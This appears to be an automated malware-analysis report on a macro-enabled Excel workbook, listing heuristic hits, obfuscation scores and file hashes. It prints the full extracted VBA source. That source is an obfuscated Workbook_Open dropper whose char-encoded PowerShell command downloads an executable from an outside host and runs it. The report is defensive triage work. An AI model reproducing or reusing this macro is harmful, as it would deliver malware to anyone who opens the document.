MALICIOUS
110
Risk Score
Heuristics 5
-
NOP sled detected high SC_NOP_SLEDFound 20+ consecutive 0x90 bytesDisassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'nop' is 78% of instructions — a sled or padding/filler run, not program logic).
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set v55 = GetObject("new:72" & MMM) -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4212 bytes |
SHA-256: 349657c231c30492d73caef8c9fb783de9dd81761ce3f0db352bee24ab145288 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
63 of 87 identifiers look randomly generated (e.g. 'nsEOWKuNuzRPhatFjlrqLVtlfVmoThjFdjvyyfDZ') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function rUgjFwdsfZeJQ(FtrZblTxoQdBQbzQSqMvdYPYyORoYdakIxzWIErvAq, udgWxziJIOvUhdTbNUfYLqtsSbdHN, RvnrUuSrTpqUSVNcSspdebVRVEknEVWawJxAhqJZJVA, iqXXepJkSjUpaVVQKenxTPYJXNvciPUJafjf, MIOMlIMoHaLUtPehCXTSOzRtgCCPL, umqjyVZlhGLUQnj, pApbXHPMS)
IRpMGtjdKZ = 6.07679705573677E+42
CajrnWdRldEFy = "PrXIJ"
gjgSGSDGYcOKGWDWtAsDBsfeE = 538951671172#
qKrCLVAwgStQl = "SXsJPuycxsxXQGanEBO"
ctPWQsJJqkdcPXkeAVPKOOMyEoEtVsOrCsrZHVs = 7.14152046441103E+19
kolNPUIsWwnimEfOgRScn = 8972579476#
nxWlaXfLWfcrZZcz = "jgMXZFfExMdtqCQjUAnqdulNKaHFue"
lgiivbsO = 25910860327#
rhcKBRfcMIFYoJEpvzMzxZKTGsMITUHcmwywR = "LtuftlZhxXdtAcfPtSXJEJEX"
rBdmsKIYUn = "ESfYtZvpeaUewWCgZH"
rUgjFwdsfZeJQ "BoXWCkvuEMVVfoMLbmzPe"
End Function
Private Sub Workbook_Open()
pbWszkcbU = "^owershell.exe $Mo=@(91,118,111,105,100,93,91,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,93,58,58,76,111,97,100,87,105,116,104,80,97,114,116,105,97,108,78,97,109,101,40,39,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,39,41,59,36,97,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,110"
pbWszkcbU = pbWszkcbU + ",108,111,97,100,70,105,108,101,39,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,115,58,47,47,117,46,116,101,107,110,105,107,46,105,111,47,117,120,66,85,72,46,116,120,116,39,44,36,101,110,118,58,116,101,109,112,43,39,92,39,43,39,68,101,87,73,82,117,78,105,103,39,43,39,46,101,120,101,39,41,59,32,115,116,97,114,116,45,112,114,111,99,101,115,115,40,36,101,110,118,58,116,101,109,112,43,39,92,39,43,39,68,101,87,73,82,117,78,105,103,39,43,39,46,101,120,101,39,41);$t=[System.Text.Encoding]::ASCII.GetString($Mo)|IEX"
If Log(367) = 7678.687546 Then
While "oBjivQdGGYTXWglkHWUjBeoVQUhTnfJNEyThtFFtRSv" = "VnhrXxuTeEqKMNRaiKTaPGS"
NErBQbRjjRzdnpvqlpiAIJU = "oeKHyVIPUJeTFtDDmGbvNontOcoZXSP"
jLMlQ = "lNJkIdLbkrm"
NBiZRzrRsWgirCuZktgRmcVNmcfJhns = 23
nsEOWKuNuzRPhatFjlrqLVtlfVmoThjFdjvyyfDZzTXmLGf = "jaawvBlSzTiAX"
tMQMly = "uHDhRqrxGZYpaFtGnJbxczewDBuaKW"
Wend
Else
'MsgBox ("fg")
MMM = "C24DD5-D70A-438B-8A42-98424B88AFB8"
If Cos(568) * Sqr(48) = Sin(588) + Log(346) Then
Else
miz = Replace(pbWszkcbU, "^", "P")
Set v55 = GetObject("new:72" & MMM)
v55.Run s & miz, Sin(0.1)
End If
End If
End Sub
Sub fEUSKnPSlxMgkIeVldhvlBVbNuCqvLmkM(PsiXWhQqeiQymfg, dnxeqdJFoqkLbtasrmYfoeOOeOhnEhCgefJLRAYl, djgwFPkIYGzGBHyYjAbvVAGnDgvkOar, nvLvhRYzxfgbCad, KmizwqNccstZTAtxPlTFwD, RbcyqTflcCXZbrrSwiiSpYzfwliMRHYbHvRYT, WIxHRWvbRFXTWWNkBsbwBFlSUVevSfaTyELZVi, dkVUdoykB, XuYxXqRXemvrzI)
xjdRqaHbmzKKgPARKOSNAditFQlYXa = "cTCKusTmHnJO"
QDNmqeAYRziTBjMZoiELn = 5.50763539280389E+16
qeFFYrbKaqPMdBCzitanKUUrtIHNSE = 1092071199
CihNjhkF = "wHZrEpGKXpA"
lAXVKOLQjOrV = 4.11162850312441E+36
MdvoTRynRqDvcmEBxpdEuRhKrZTYpZiP = "GsLLWD"
BXUKUZhbHOmYORquvlwuyZ = "rHnsWutqamGCWxXpSrrRanKBmPxPZZIZcZcCghKgOX"
lIOUwYveCGHX = 8.72660086900126E+36
xmFHwdQ = 2.29157474961719E+37
dgaw = 5.97491929185986E+16
UIkhLDCbYtXvArdvGSUC = "FubCkkHKIboXbDntUvDUdY"
hMwlmFXOFtxOOIeaSvQQRjXYnqBlXQiuhAtqnz = "FkNidepZlpUlYMHbyoX"
wDlroLCgNOonTbLfEBtuyRQvCfJiaZvBQBYBzVtScI = "WBhSxAbWwudze"
poJBUGnSmWRCJgiHbSpFuuVNMhyCyGmCt = 8.558293056832E+37
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 22528 bytes |
SHA-256: ce76b2bf41cf666511a84e9fe975cd72a5fd1e8a49ac2a41a69c50dadb6c7d76 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
195 of 289 identifiers look randomly generated (e.g. 'nsEOWKuNuzRPhatFjlrqLVtlfVmoThjFdjvyyfDZ') — consistent with name-mangling obfuscation.
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.